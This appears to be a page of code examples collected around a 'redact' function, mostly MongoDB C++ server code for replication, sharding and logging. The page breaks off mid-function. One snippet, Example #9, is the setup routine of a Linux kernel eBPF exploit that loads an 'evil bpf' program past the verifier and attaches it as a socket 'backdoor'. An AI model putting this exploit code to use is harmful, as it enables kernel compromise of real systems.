Example #1
0
OpTimeWithHash BackgroundSync::_readLastAppliedOpTimeWithHash(OperationContext* opCtx) {
    BSONObj oplogEntry;
    try {
        bool success = writeConflictRetry(
            opCtx, "readLastAppliedHash", NamespaceString::kRsOplogNamespace.ns(), [&] {
                Lock::DBLock lk(opCtx, "local", MODE_X);
                return Helpers::getLast(
                    opCtx, NamespaceString::kRsOplogNamespace.ns().c_str(), oplogEntry);
            });

        if (!success) {
            // This can happen when we are about to do an initial sync. lastHash will be set
            // after the initial sync is complete.
            return OpTimeWithHash(0);
        }
    } catch (const DBException& ex) {
        severe() << "Problem reading " << NamespaceString::kRsOplogNamespace.ns() << ": "
                 << redact(ex);
        fassertFailed(18904);
    }
    long long hash;
    auto status = bsonExtractIntegerField(oplogEntry, kHashFieldName, &hash);
    if (!status.isOK()) {
        severe() << "Most recent entry in " << NamespaceString::kRsOplogNamespace.ns()
                 << " is missing or has invalid \"" << kHashFieldName
                 << "\" field. Oplog entry: " << redact(oplogEntry) << ": " << redact(status);
        fassertFailed(18902);
    }
    OplogEntry parsedEntry(oplogEntry);
    return OpTimeWithHash(hash, parsedEntry.getOpTime());
}
Example #2
0
void ClusterAggregate::killAllCursors(const std::vector<Strategy::CommandResult>& shardResults) {
    // This function must ignore and log all errors. Callers expect a best-effort attempt at
    // cleanup without exceptions. If any cursors aren't cleaned up here, they will be cleaned
    // up automatically on the shard after 10 minutes anyway.

    for (size_t i = 0; i < shardResults.size(); i++) {
        try {
            BSONObj result = shardResults[i].result;
            if (!result["ok"].trueValue()) {
                continue;
            }

            const long long cursor = result["cursor"]["id"].Long();
            if (!cursor) {
                continue;
            }

            ScopedDbConnection conn(shardResults[i].target);
            conn->killCursor(cursor);
            conn.done();
        } catch (const DBException& e) {
            log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target
                  << " due to DBException: " << redact(e);
        } catch (const std::exception& e) {
            log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target
                  << " due to std::exception: " << redact(e.what());
        } catch (...) {
            log() << "Couldn't kill aggregation cursor on shard: " << shardResults[i].target
                  << " due to non-exception";
        }
    }
}
Example #3
0
/**
 * Remaps the private view from the shared view so that it does not consume too much
 * copy-on-write/swap space. Must only be called after the in-memory journal has been flushed
 * to disk and applied on top of the shared view.
 *
 * @param fraction Value between (0, 1] indicating what fraction of the memory to remap.
 *      Remapping too much or too frequently incurs copy-on-write page fault cost.
 */
static void remapPrivateView(OperationContext* opCtx, double fraction) {
    // Remapping private views must occur after WRITETODATAFILES, otherwise we wouldn't see any
    // newly written data on reads.
    invariant(!commitJob.hasWritten());

    try {
        Timer t;
        remapPrivateViewImpl(opCtx, fraction);
        stats.curr()->_remapPrivateViewMicros += t.micros();

        LOG(4) << "remapPrivateView end";
        return;
    } catch (DBException& e) {
        severe() << "dbexception in remapPrivateView causing immediate shutdown: " << redact(e);
    } catch (std::ios_base::failure& e) {
        severe() << "ios_base exception in remapPrivateView causing immediate shutdown: "
                 << redact(e.what());
    } catch (std::bad_alloc& e) {
        severe() << "bad_alloc exception in remapPrivateView causing immediate shutdown: "
                 << redact(e.what());
    } catch (std::exception& e) {
        severe() << "exception in remapPrivateView causing immediate shutdown: "
                 << redact(e.what());
    } catch (...) {
        severe() << "unknown exception in remapPrivateView causing immediate shutdown: ";
    }

    invariant(false);
}
Example #4
0
/**
 * Invoked at server startup. Recovers the database by replaying journal files and then
 * starts the durability thread.
 */
void startup(ClockSource* cs, int64_t serverStartMs) {
    if (!storageGlobalParams.dur) {
        return;
    }

    journalMakeDir(cs, serverStartMs);

    try {
        replayJournalFilesAtStartup();
    } catch (DBException& e) {
        severe() << "dbexception during recovery: " << redact(e);
        throw;
    } catch (std::exception& e) {
        severe() << "std::exception during recovery: " << redact(e.what());
        throw;
    } catch (...) {
        severe() << "exception during recovery";
        throw;
    }

    preallocateFiles();

    durableImpl.start(cs, serverStartMs);
    DurableInterface::_impl = &durableImpl;
}
void ShardingEgressMetadataHookForMongos::_saveGLEStats(const BSONObj& metadata,
                                                        StringData hostString) {
    if (!haveClient()) {
        // Client will be present only when write commands are used.
        return;
    }

    auto swShardingMetadata = rpc::ShardingMetadata::readFromMetadata(metadata);
    if (swShardingMetadata.getStatus() == ErrorCodes::NoSuchKey) {
        return;
    } else if (!swShardingMetadata.isOK()) {
        warning() << "Got invalid sharding metadata " << redact(swShardingMetadata.getStatus())
                  << " metadata object was '" << redact(metadata) << "'";
        return;
    }

    auto shardConn = ConnectionString::parse(hostString.toString());

    // If we got the reply from this host, we expect that its 'hostString' must be valid.
    if (!shardConn.isOK()) {
        severe() << "got bad host string in saveGLEStats: " << hostString;
    }
    invariantOK(shardConn.getStatus());

    auto shardingMetadata = std::move(swShardingMetadata.getValue());

    auto& clientInfo = cc();
    LOG(4) << "saveGLEStats lastOpTime:" << shardingMetadata.getLastOpTime()
           << " electionId:" << shardingMetadata.getLastElectionId();

    ClusterLastErrorInfo::get(clientInfo)
        ->addHostOpTime(
            shardConn.getValue(),
            HostOpTime(shardingMetadata.getLastOpTime(), shardingMetadata.getLastElectionId()));
}
Example #6
0
void CollectionCloner::_finishCallback(const Status& status) {
    LOG(1) << "CollectionCloner ns:" << _destNss << " finished with status: " << redact(status);
    // Copy the status so we can change it below if needed.
    auto finalStatus = status;
    bool callCollectionLoader = false;
    UniqueLock lk(_mutex);
    callCollectionLoader = _collLoader.operator bool();
    lk.unlock();
    if (callCollectionLoader) {
        if (finalStatus.isOK()) {
            const auto loaderStatus = _collLoader->commit();
            if (!loaderStatus.isOK()) {
                warning() << "Failed to commit changes to collection " << _destNss.ns() << ": "
                          << redact(loaderStatus);
                finalStatus = loaderStatus;
            }
        }

        // This will release the resources held by the loader.
        _collLoader.reset();
    }
    _onCompletion(finalStatus);
    lk.lock();
    _stats.end = _executor->now();
    _progressMeter.finished();
    _active = false;
    _condition.notify_all();
    LOG(1) << "    collection: " << _destNss << ", stats: " << _stats.toString();
}
Example #7
0
long long BackgroundSync::_readLastAppliedHash(OperationContext* txn) {
    BSONObj oplogEntry;
    try {
        MONGO_WRITE_CONFLICT_RETRY_LOOP_BEGIN {
            ScopedTransaction transaction(txn, MODE_IX);
            Lock::DBLock lk(txn->lockState(), "local", MODE_X);
            bool success = Helpers::getLast(txn, rsOplogName.c_str(), oplogEntry);
            if (!success) {
                // This can happen when we are about to do an initial sync. lastHash will be set
                // after the initial sync is complete.
                return 0;
            }
        }
        MONGO_WRITE_CONFLICT_RETRY_LOOP_END(txn, "readLastAppliedHash", rsOplogName);
    } catch (const DBException& ex) {
        severe() << "Problem reading " << rsOplogName << ": " << redact(ex);
        fassertFailed(18904);
    }
    long long hash;
    auto status = bsonExtractIntegerField(oplogEntry, kHashFieldName, &hash);
    if (!status.isOK()) {
        severe() << "Most recent entry in " << rsOplogName << " is missing or has invalid \""
                 << kHashFieldName << "\" field. Oplog entry: " << redact(oplogEntry) << ": "
                 << redact(status);
        fassertFailed(18902);
    }
    return hash;
}
void onDbVersionMismatch(OperationContext* opCtx,
                         const StringData dbName,
                         const DatabaseVersion& clientDbVersion,
                         const boost::optional<DatabaseVersion>& serverDbVersion) noexcept {
    invariant(!opCtx->lockState()->isLocked());
    invariant(!opCtx->getClient()->isInDirectClient());

    auto const shardingState = ShardingState::get(opCtx);
    invariant(shardingState->canAcceptShardedCommands());

    if (serverDbVersion && serverDbVersion->getUuid() == clientDbVersion.getUuid() &&
        serverDbVersion->getLastMod() >= clientDbVersion.getLastMod()) {
        // The client was stale; do not trigger server-side refresh.
        return;
    }

    try {
        // TODO SERVER-33773 if the 'waitForMovePrimaryCriticalSection' flag is set on the
        // OperationShardingState, wait for the movePrimary critical section to complete before
        // attempting a refresh.
    } catch (const DBException& ex) {
        log() << "Failed to wait for movePrimary critical section to complete "
              << causedBy(redact(ex));
        return;
    }

    try {
        forceDatabaseRefresh(opCtx, dbName);
    } catch (const DBException& ex) {
        log() << "Failed to refresh databaseVersion for database " << dbName
              << causedBy(redact(ex));
    }
}
Example #9
0
void 
initialize() {
	info("\n");
	info("t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n");
	info("\n");
	info("  ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n");
	info("\n");

	redact("creating bpf map\n");
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
	if (mapfd < 0) {
		fail("failed to create bpf map: '%s'\n", strerror(errno));
	}

	redact("sneaking evil bpf past the verifier\n");
	progfd = load_prog();
	if (progfd < 0) {
		if (errno == EACCES) {
			msg("log:\n%s", bpf_log_buf);
		}
		fail("failed to load prog '%s'\n", strerror(errno));
	}

	redact("creating socketpair()\n");
	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
		fail("failed to create socket pair '%s'\n", strerror(errno));
	}

	redact("attaching bpf backdoor to socket\n");
	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
		fail("setsockopt '%s'\n", strerror(errno));
	}
}
Example #10
0
Status ShardingStateRecovery::recover(OperationContext* opCtx) {
    if (serverGlobalParams.clusterRole != ClusterRole::ShardServer) {
        return Status::OK();
    }

    BSONObj recoveryDocBSON;

    try {
        AutoGetCollection autoColl(opCtx, NamespaceString::kConfigCollectionNamespace, MODE_IS);
        if (!Helpers::findOne(
                opCtx, autoColl.getCollection(), RecoveryDocument::getQuery(), recoveryDocBSON)) {
            return Status::OK();
        }
    } catch (const DBException& ex) {
        return ex.toStatus();
    }

    const auto recoveryDocStatus = RecoveryDocument::fromBSON(recoveryDocBSON);
    if (!recoveryDocStatus.isOK())
        return recoveryDocStatus.getStatus();

    const auto recoveryDoc = std::move(recoveryDocStatus.getValue());

    log() << "Sharding state recovery process found document " << redact(recoveryDoc.toBSON());

    ShardingState* const shardingState = ShardingState::get(opCtx);
    invariant(shardingState->enabled());

    if (!recoveryDoc.getMinOpTimeUpdaters()) {
        // Treat the minOpTime as up-to-date
        grid.advanceConfigOpTime(recoveryDoc.getMinOpTime());
        return Status::OK();
    }

    log() << "Sharding state recovery document indicates there were "
          << recoveryDoc.getMinOpTimeUpdaters()
          << " metadata change operations in flight. Contacting the config server primary in order "
             "to retrieve the most recent opTime.";

    // Need to fetch the latest opTime from the config server, so do a logging write
    Status status =
        grid.catalogClient(opCtx)->logChange(opCtx,
                                             "Sharding minOpTime recovery",
                                             NamespaceString::kConfigCollectionNamespace.ns(),
                                             recoveryDocBSON,
                                             ShardingCatalogClient::kMajorityWriteConcern);
    if (!status.isOK())
        return status;

    log() << "Sharding state recovered. New config server opTime is " << grid.configOpTime();

    // Finally, clear the recovery document so next time we don't need to recover
    status = modifyRecoveryDocument(opCtx, RecoveryDocument::Clear, kLocalWriteConcern);
    if (!status.isOK()) {
        warning() << "Failed to reset sharding state recovery document due to " << redact(status);
    }

    return Status::OK();
}
Example #11
0
void AbstractIndexAccessMethod::getKeys(const BSONObj& obj,
                                        GetKeysMode mode,
                                        BSONObjSet* keys,
                                        BSONObjSet* multikeyMetadataKeys,
                                        MultikeyPaths* multikeyPaths) const {
    // TODO SERVER-36385: Remove ErrorCodes::KeyTooLong.
    static stdx::unordered_set<int> whiteList{ErrorCodes::CannotBuildIndexKeys,
                                              // Btree
                                              ErrorCodes::KeyTooLong,
                                              ErrorCodes::CannotIndexParallelArrays,
                                              // FTS
                                              16732,
                                              16733,
                                              16675,
                                              17261,
                                              17262,
                                              // Hash
                                              16766,
                                              // Haystack
                                              16775,
                                              16776,
                                              // 2dsphere geo
                                              16755,
                                              16756,
                                              // 2d geo
                                              16804,
                                              13067,
                                              13068,
                                              13026,
                                              13027};
    try {
        doGetKeys(obj, keys, multikeyMetadataKeys, multikeyPaths);
    } catch (const AssertionException& ex) {
        // Suppress all indexing errors when mode is kRelaxConstraints.
        if (mode == GetKeysMode::kEnforceConstraints) {
            throw;
        }

        keys->clear();
        if (multikeyPaths) {
            multikeyPaths->clear();
        }
        // Only suppress the errors in the whitelist.
        if (whiteList.find(ex.code()) == whiteList.end()) {
            throw;
        }

        // If the document applies to the filter (which means that it should have never been
        // indexed), do not suppress the error.
        const MatchExpression* filter = _btreeState->getFilterExpression();
        if (mode == GetKeysMode::kRelaxConstraintsUnfiltered && filter &&
            filter->matchesBSON(obj)) {
            throw;
        }

        LOG(1) << "Ignoring indexing error for idempotency reasons: " << redact(ex)
               << " when getting index keys of " << redact(obj);
    }
}
Example #12
0
static void logCursorsWaiting(RangeDeleteEntry* entry) {
    // We always log the first cursors waiting message (so we have cursor ids in the logs).
    // After 15 minutes (the cursor timeout period), we start logging additional messages at
    // a 1 minute interval.
    static const auto kLogCursorsThreshold = Minutes{15};
    static const auto kLogCursorsInterval = Minutes{1};

    Date_t currentTime = jsTime();
    Milliseconds elapsedMillisSinceQueued{0};

    // We always log the first message (i.e. when lastLoggedTS has not been set yet).
    if (entry->lastLoggedTS != Date_t()) {
        if (currentTime > entry->stats.queueStartTS)
            elapsedMillisSinceQueued = currentTime - entry->stats.queueStartTS;

        // Not logging, threshold not passed
        if (elapsedMillisSinceQueued < kLogCursorsThreshold)
            return;

        Milliseconds elapsedMillisSinceLog{0};
        if (currentTime > entry->lastLoggedTS)
            elapsedMillisSinceLog = currentTime - entry->lastLoggedTS;

        // Not logging, logged a short time ago
        if (elapsedMillisSinceLog < kLogCursorsInterval)
            return;
    }

    str::stream cursorList;
    for (std::set<CursorId>::const_iterator it = entry->cursorsToWait.begin();
         it != entry->cursorsToWait.end();
         ++it) {
        if (it != entry->cursorsToWait.begin())
            cursorList << ", ";
        cursorList << *it;
    }

    log() << "waiting for open cursors before removing range "
          << "[" << redact(entry->options.range.minKey) << ", "
          << redact(entry->options.range.maxKey) << ") "
          << "in " << entry->options.range.ns
          << (entry->lastLoggedTS == Date_t()
                  ? string("")
                  : string(str::stream() << ", elapsed secs: "
                                         << durationCount<Seconds>(elapsedMillisSinceQueued)))
          << ", cursor ids: [" << string(cursorList) << "]";

    entry->lastLoggedTS = currentTime;
}
Example #13
0
MoveTimingHelper::~MoveTimingHelper() {
    // Even if logChange doesn't throw, the BSON building below can, so catch everything here.
    try {
        if (_to.isValid()) {
            _b.append("to", _to.toString());
        }

        if (_from.isValid()) {
            _b.append("from", _from.toString());
        }

        if (_nextStep != _totalNumSteps) {
            _b.append("note", "aborted");
        } else {
            _b.append("note", "success");
        }

        if (!_cmdErrmsg->empty()) {
            _b.append("errmsg", *_cmdErrmsg);
        }

        grid.catalogClient(_txn)->logChange(_txn,
                                            str::stream() << "moveChunk." << _where,
                                            _ns,
                                            _b.obj(),
                                            ShardingCatalogClient::kMajorityWriteConcern);
    } catch (const std::exception& e) {
        warning() << "couldn't record timing for moveChunk '" << _where
                  << "': " << redact(e.what());
    }
}
Example #14
0
StatusWith<DistLockManager::ScopedDistLock> MigrationManager::_getDistLock(
    OperationContext* txn, const Migration& migration) {
    const std::string whyMessage(str::stream() << "migrating chunk "
                                               << ChunkRange(migration.chunkInfo.migrateInfo.minKey,
                                                             migration.chunkInfo.migrateInfo.maxKey)
                                                      .toString()
                                               << " in "
                                               << migration.chunkInfo.migrateInfo.ns);

    StatusWith<DistLockManager::ScopedDistLock> distLockStatus =
        Grid::get(txn)->catalogClient(txn)->distLock(
            txn, migration.chunkInfo.migrateInfo.ns, whyMessage);

    if (!distLockStatus.isOK()) {
        const std::string msg = str::stream()
            << "Could not acquire collection lock for " << migration.chunkInfo.migrateInfo.ns
            << " to migrate chunk " << redact(ChunkRange(migration.chunkInfo.migrateInfo.minKey,
                                                         migration.chunkInfo.migrateInfo.maxKey)
                                                  .toString())
            << " due to " << distLockStatus.getStatus().toString();
        warning() << msg;
        return {distLockStatus.getStatus().code(), msg};
    }

    return std::move(distLockStatus.getValue());
}
Example #15
0
void BackgroundJob::jobBody() {
    const string threadName = name();
    if (!threadName.empty()) {
        setThreadName(threadName);
    }

    LOG(1) << "BackgroundJob starting: " << threadName;

    try {
        run();
    } catch (const std::exception& e) {
        error() << "backgroundjob " << threadName << " exception: " << redact(e.what());
        throw;
    }

    // We must cache this value so that we can use it after we leave the following scope.
    const bool selfDelete = _selfDelete;

    {
        // It is illegal to access any state owned by this BackgroundJob after leaving this
        // scope, with the exception of the call to 'delete this' below.
        stdx::unique_lock<stdx::mutex> l(_status->mutex);
        _status->state = Done;
        _status->done.notify_all();
    }

    if (selfDelete)
        delete this;
}
Example #16
0
void Database::clearTmpCollections(OperationContext* txn) {
    invariant(txn->lockState()->isDbLockedForMode(name(), MODE_X));

    list<string> collections;
    _dbEntry->getCollectionNamespaces(&collections);

    for (list<string>::iterator i = collections.begin(); i != collections.end(); ++i) {
        string ns = *i;
        invariant(NamespaceString::normal(ns));

        CollectionCatalogEntry* coll = _dbEntry->getCollectionCatalogEntry(ns);

        CollectionOptions options = coll->getCollectionOptions(txn);
        if (!options.temp)
            continue;
        try {
            WriteUnitOfWork wunit(txn);
            Status status = dropCollection(txn, ns);
            if (!status.isOK()) {
                warning() << "could not drop temp collection '" << ns << "': " << redact(status);
                continue;
            }

            wunit.commit();
        } catch (const WriteConflictException& exp) {
            warning() << "could not drop temp collection '" << ns << "' due to "
                                                                     "WriteConflictException";
            txn->recoveryUnit()->abandonSnapshot();
        }
    }
}
std::string MoveChunkRequest::toString() const {
    std::stringstream ss;
    ss << "ns: " << getNss().ns() << ", " << redact(ChunkRange(getMinKey(), getMaxKey()).toString())
       << ", fromShard: " << getFromShardId() << ", toShard: " << getToShardId();

    return ss.str();
}
Example #18
0
void WiredTigerRecoveryUnit::_abort() {
    try {
        bool notifyDone = !_prepareTimestamp.isNull();
        if (_session && _isActive()) {
            _txnClose(false);
        }
        _setState(State::kAborting);

        if (MONGO_FAIL_POINT(WTAlwaysNotifyPrepareConflictWaiters)) {
            notifyDone = true;
        }

        if (notifyDone) {
            _sessionCache->notifyPreparedUnitOfWorkHasCommittedOrAborted();
        }

        for (Changes::const_reverse_iterator it = _changes.rbegin(), end = _changes.rend();
             it != end;
             ++it) {
            Change* change = it->get();
            LOG(2) << "CUSTOM ROLLBACK " << redact(demangleName(typeid(*change)));
            change->rollback();
        }
        _changes.clear();
    } catch (...) {
        std::terminate();
    }

    _setState(State::kInactive);
}
Example #19
0
Database::Database(OperationContext* txn, StringData name, DatabaseCatalogEntry* dbEntry)
    : _name(name.toString()),
      _dbEntry(dbEntry),
      _profileName(_name + ".system.profile"),
      _indexesName(_name + ".system.indexes"),
      _viewsName(_name + "." + DurableViewCatalog::viewsCollectionName().toString()),
      _durableViews(DurableViewCatalogImpl(this)),
      _views(&_durableViews) {
    Status status = validateDBName(_name);
    if (!status.isOK()) {
        warning() << "tried to open invalid db: " << _name;
        uasserted(10028, status.toString());
    }

    _profile = serverGlobalParams.defaultProfile;

    list<string> collections;
    _dbEntry->getCollectionNamespaces(&collections);
    for (list<string>::const_iterator it = collections.begin(); it != collections.end(); ++it) {
        const string ns = *it;
        _collections[ns] = _getOrCreateCollectionInstance(txn, ns);
    }
    // At construction time of the viewCatalog, the _collections map wasn't initialized yet, so no
    // system.views collection would be found. Now we're sufficiently initialized, signal a version
    // change. Also force a reload, so if there are problems with the catalog contents as might be
    // caused by incorrect mongod versions or similar, they are found right away.
    _views.invalidate();
    Status reloadStatus = _views.reloadIfNeeded(txn);
    if (!reloadStatus.isOK()) {
        warning() << "Unable to parse views: " << redact(reloadStatus)
                  << "; remove any invalid views from the " << _viewsName
                  << " collection to restore server functionality." << startupWarningsLog;
    }
}
void NetworkInterfaceASIO::_beginCommunication(AsyncOp* op) {
    // The way that we connect connections for the connection pool is by
    // starting the callback chain with connect(), but getting off at the first
    // _beginCommunication. I.e. all AsyncOp's start off with _inSetup == true
    // and arrive here as they're connected and authed. Once they hit here, we
    // return to the connection pool's get() callback with _inSetup == false,
    // so we can proceed with user operations after they return to this
    // codepath.
    if (op->_inSetup) {
        log() << "Successfully connected to " << op->request().target.toString();
        op->_inSetup = false;
        op->finish(RemoteCommandResponse());
        return;
    }

    LOG(3) << "Initiating asynchronous command: " << redact(op->request().toString());

    auto beginStatus = op->beginCommand(op->request());
    if (!beginStatus.isOK()) {
        return _completeOperation(op, beginStatus);
    }

    _asyncRunCommand(op, [this, op](std::error_code ec, size_t bytes) {
        _validateAndRun(op, ec, [this, op]() { _completedOpCallback(op); });
    });
}
Example #21
0
void ShardingStateRecovery::endMetadataOp(OperationContext* opCtx) {
    Status status =
        modifyRecoveryDocument(opCtx, RecoveryDocument::Decrement, WriteConcernOptions());
    if (!status.isOK()) {
        warning() << "Failed to decrement minOpTimeUpdaters due to " << redact(status);
    }
}
void ShardingInitializationMongoD::updateShardIdentityConfigString(
    OperationContext* opCtx, const ConnectionString& newConnectionString) {
    BSONObj updateObj(
        ShardIdentityType::createConfigServerUpdateObject(newConnectionString.toString()));

    UpdateRequest updateReq(NamespaceString::kServerConfigurationNamespace);
    updateReq.setQuery(BSON("_id" << ShardIdentityType::IdName));
    updateReq.setUpdateModification(updateObj);

    try {
        AutoGetOrCreateDb autoDb(
            opCtx, NamespaceString::kServerConfigurationNamespace.db(), MODE_X);

        auto result = update(opCtx, autoDb.getDb(), updateReq);
        if (result.numMatched == 0) {
            warning() << "failed to update config string of shard identity document because "
                      << "it does not exist. This shard could have been removed from the cluster";
        } else {
            LOG(2) << "Updated config server connection string in shardIdentity document to"
                   << newConnectionString;
        }
    } catch (const DBException& exception) {
        auto status = exception.toStatus();
        if (!ErrorCodes::isNotMasterError(status.code())) {
            warning() << "Error encountered while trying to update config connection string to "
                      << newConnectionString.toString() << causedBy(redact(status));
        }
    }
}
Example #23
0
Message OpMsgBuilder::finish() {
    if (kDebugBuild && !disableDupeFieldCheck_forTest.load()) {
        std::set<StringData> seenFields;
        for (auto elem : resumeBody().asTempObj()) {
            if (!(seenFields.insert(elem.fieldNameStringData()).second)) {
                severe() << "OP_MSG with duplicate field '" << elem.fieldNameStringData()
                         << "' : " << redact(resumeBody().asTempObj());
                fassert(40474, false);
            }
        }
    }

    invariant(_state == kBody);
    invariant(_bodyStart);
    invariant(!_openBuilder);
    _state = kDone;

    const auto size = _buf.len();
    MSGHEADER::View header(_buf.buf());
    header.setMessageLength(size);
    // header.setRequestMsgId(...); // These are currently filled in by the networking layer.
    // header.setResponseToMsgId(...);
    header.setOpCode(dbMsg);
    return Message(_buf.release());
}
Example #24
0
void RSDataSync::_run() {
    Client::initThread("rsSync");
    AuthorizationSession::get(cc())->grantInternalAuthorization();

    // Overwrite prefetch index mode in BackgroundSync if ReplSettings has a mode set.
    auto&& replSettings = _replCoord->getSettings();
    if (replSettings.isPrefetchIndexModeSet())
        _replCoord->setIndexPrefetchConfig(replSettings.getPrefetchIndexMode());

    while (!_bgsync->inShutdown()) {
        // After a reconfig, we may not be in the replica set anymore, so
        // check that we are in the set (and not an arbiter) before
        // trying to sync with other replicas.
        // TODO(spencer): Use a condition variable to await loading a config
        if (_replCoord->getMemberState().startup()) {
            warning() << "did not receive a valid config yet";
            sleepsecs(1);
            continue;
        }

        const MemberState memberState = _replCoord->getMemberState();

        // TODO(siyuan) Control the behavior using applier state.
        // An arbiter can never transition to any other state, and doesn't replicate, ever
        if (memberState.arbiter()) {
            break;
        }

        // If we are removed then we don't belong to the set anymore
        if (memberState.removed()) {
            sleepsecs(5);
            continue;
        }

        try {
            if (_replCoord->getApplierState() == ReplicationCoordinator::ApplierState::Stopped) {
                sleepsecs(1);
                continue;
            }

            auto status = _replCoord->setFollowerMode(MemberState::RS_RECOVERING);
            if (!status.isOK()) {
                LOG(2) << "Failed to transition to RECOVERING to start data replication"
                       << causedBy(status);
                continue;
            }

            // Once we call into SyncTail::oplogApplication we never return, so this code only runs
            // at startup.  It is not valid to transition from PRIMARY to RECOVERING ever, or from
            // SECONDARY to RECOVERING without holding a global X lock, so we invariant to make
            // sure this never happens.
            invariant(!memberState.primary() && !memberState.secondary());
            SyncTail(_bgsync, multiSyncApply).oplogApplication(_replCoord);
        } catch (...) {
            auto status = exceptionToStatus();
            severe() << "Exception thrown in RSDataSync: " << redact(status);
            std::terminate();
        }
    }
}
Example #25
0
void CollectionCloner::_finishCallback(const Status& status) {
    log() << "CollectionCloner ns:" << _destNss
          << " finished cloning with status: " << redact(status);
    // Copy the status so we can change it below if needed.
    auto finalStatus = status;
    bool callCollectionLoader = false;
    decltype(_onCompletion) onCompletion;
    {
        LockGuard lk(_mutex);
        invariant(_state != State::kComplete);

        callCollectionLoader = _collLoader.operator bool();

        invariant(_onCompletion);
        std::swap(_onCompletion, onCompletion);
    }
    if (callCollectionLoader) {
        if (finalStatus.isOK()) {
            const auto loaderStatus = _collLoader->commit();
            if (!loaderStatus.isOK()) {
                warning() << "Failed to commit collection indexes " << _destNss.ns() << ": "
                          << redact(loaderStatus);
                finalStatus = loaderStatus;
            }
        }

        // This will release the resources held by the loader.
        _collLoader.reset();
    }
    onCompletion(finalStatus);

    // This will release the resources held by the callback function object. '_onCompletion' is
    // already cleared at this point and 'onCompletion' is the remaining reference to the callback
    // function (with any implicitly held resources). To avoid any issues with destruction logic
    // in the function object's resources accessing this CollectionCloner, we release this function
    // object outside the lock.
    onCompletion = {};

    LockGuard lk(_mutex);
    _stats.end = _executor->now();
    _progressMeter.finished();
    _state = State::kComplete;
    _condition.notify_all();
    LOG(1) << "    collection: " << _destNss << ", stats: " << _stats.toString();
}
StatusWith<OplogApplier::Operations> OplogApplier::getNextApplierBatch(
    OperationContext* opCtx, const BatchLimits& batchLimits) {
    if (batchLimits.ops == 0) {
        return Status(ErrorCodes::InvalidOptions, "Batch size must be greater than 0.");
    }

    std::uint32_t totalBytes = 0;
    Operations ops;
    BSONObj op;
    while (_oplogBuffer->peek(opCtx, &op)) {
        auto entry = OplogEntry(op);

        // Check for oplog version change. If it is absent, its value is one.
        if (entry.getVersion() != OplogEntry::kOplogVersion) {
            std::string message = str::stream()
                << "expected oplog version " << OplogEntry::kOplogVersion << " but found version "
                << entry.getVersion() << " in oplog entry: " << redact(entry.toBSON());
            severe() << message;
            return {ErrorCodes::BadValue, message};
        }

        // Commands must be processed one at a time. The only exception to this is applyOps because
        // applyOps oplog entries are effectively containers for CRUD operations. Therefore, it is
        // safe to batch applyOps commands with CRUD operations when reading from the oplog buffer.
        if (entry.isCommand() && (entry.getCommandType() != OplogEntry::CommandType::kApplyOps ||
                                  entry.shouldPrepare())) {
            if (ops.empty()) {
                // Apply commands one-at-a-time.
                ops.push_back(std::move(entry));
                BSONObj opToPopAndDiscard;
                invariant(_oplogBuffer->tryPop(opCtx, &opToPopAndDiscard));
                dassert(ops.back() == OplogEntry(opToPopAndDiscard));
            }

            // Otherwise, apply what we have so far and come back for the command.
            return std::move(ops);
        }

        // Apply replication batch limits.
        if (ops.size() >= batchLimits.ops) {
            return std::move(ops);
        }

        // Never return an empty batch if there are operations left.
        if ((totalBytes + entry.getRawObjSizeBytes() >= batchLimits.bytes) && (ops.size() > 0)) {
            return std::move(ops);
        }

        // Add op to buffer.
        totalBytes += entry.getRawObjSizeBytes();
        ops.push_back(std::move(entry));
        BSONObj opToPopAndDiscard;
        invariant(_oplogBuffer->tryPop(opCtx, &opToPopAndDiscard));
        dassert(ops.back() == OplogEntry(opToPopAndDiscard));
    }
    return std::move(ops);
}
Example #27
0
NOINLINE_DECL void uassertedWithLocation(int msgid,
                                         const char* msg,
                                         const char* file,
                                         unsigned line) {
    assertionCount.condrollover(++assertionCount.user);
    LOG(1) << "User Assertion: " << msgid << ":" << redact(msg) << ' ' << file << ' ' << dec << line
           << endl;
    throw UserException(msgid, msg);
}
Example #28
0
NOINLINE_DECL void msgassertedNoTraceWithLocation(int msgid,
                                                  const char* msg,
                                                  const char* file,
                                                  unsigned line) {
    assertionCount.condrollover(++assertionCount.warning);
    log() << "Assertion: " << msgid << ":" << redact(msg) << ' ' << file << ' ' << dec << line
          << endl;
    throw MsgAssertionException(msgid, msg);
}
Example #29
0
void BackgroundSync::_rollback(OperationContext* txn,
                               const HostAndPort& source,
                               stdx::function<DBClientBase*()> getConnection) {
    // Abort only when syncRollback detects we are in an unrecoverable state.
    // In other cases, we log the message contained in the error status and retry later.
    auto status = syncRollback(txn,
                               OplogInterfaceLocal(txn, rsOplogName),
                               RollbackSourceImpl(getConnection, source, rsOplogName),
                               _replCoord);
    if (status.isOK()) {
        // Signal the syncTail thread that there is no new data by adding a sentinel to the buffer.
        _signalNoNewDataForApplier(txn);
        // Wait until the buffer is empty.
        // This is an indication that syncTail has removed the sentinel marker from the buffer
        // and reset its local lastAppliedOpTime via the replCoord.
        while (!_oplogBuffer->isEmpty()) {
            sleepmillis(10);
            if (inShutdown()) {
                return;
            }
        }

        // At this point we are about to leave rollback.  Before we do, wait for any writes done
        // as part of rollback to be durable, and then do any necessary checks that we didn't
        // wind up rolling back something illegal.  We must wait for the rollback to be durable
        // so that if we wind up shutting down uncleanly in response to something we rolled back
        // we know that we won't wind up right back in the same situation when we start back up
        // because the rollback wasn't durable.
        txn->recoveryUnit()->waitUntilDurable();

        // If we detected that we rolled back the shardIdentity document as part of this rollback
        // then we must shut down to clear the in-memory ShardingState associated with the
        // shardIdentity document.
        if (ShardIdentityRollbackNotifier::get(txn)->didRollbackHappen()) {
            severe()
                << "shardIdentity document rollback detected.  Shutting down to clear "
                   "in-memory sharding state.  Restarting this process should safely return it "
                   "to a healthy state";
            fassertFailedNoTrace(40276);
        }

        // It is now safe to clear the ROLLBACK state, which may result in the applier thread
        // transitioning to SECONDARY.  This is safe because the applier thread has now reloaded
        // the new rollback minValid from the database.
        if (!_replCoord->setFollowerMode(MemberState::RS_RECOVERING)) {
            warning() << "Failed to transition into " << MemberState(MemberState::RS_RECOVERING)
